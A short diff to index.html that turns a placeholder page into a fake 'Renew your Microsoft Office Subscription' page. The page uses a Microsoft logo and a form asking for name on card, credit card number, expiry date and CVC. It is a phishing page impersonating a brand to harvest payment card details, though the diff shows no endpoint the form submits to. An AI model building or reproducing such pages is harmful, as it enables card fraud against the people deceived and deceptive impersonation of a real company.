--- a/index.html
+++ b/index.html
@@ -10,10 +10,20 @@
         <meta property="og:image" content="http://graphics8.nytimes.com/images/2011/12/08/technology/bits-newtwitter/bits-newtwitter-tmagArticle.jpg" />
     </head>
 
-    <body>
-
-        <h1>My First Heading</h1>
-        <p>My first paragraph.</p>
+    <body style="font-family:calibri">
+		<img src="logo.png" alt="Microsoft Logo" style="width:200px;">
+		<p><b>Renew your Microsoft Office Subscription</b></p>
+		<form>
+			<label for="name">Name on Card:</label>
+			<input type="text" id="name" name="name"><br><br>
+			<label for="number">Credit Card Number:</label>
+			<input type="text" id="number" name="number"><br><br>
+			<label for="expiry">Expiry Date:</label>
+			<input type="text" id="expiry" name="expiry"><br><br>
+			<label for="cvc">CVC:</label>
+			<input type="text" id="cvc" name="cvc"><br><br>
+			<input type="submit" value="Submit">
+		</form> 
 
     </body>
 </html> 
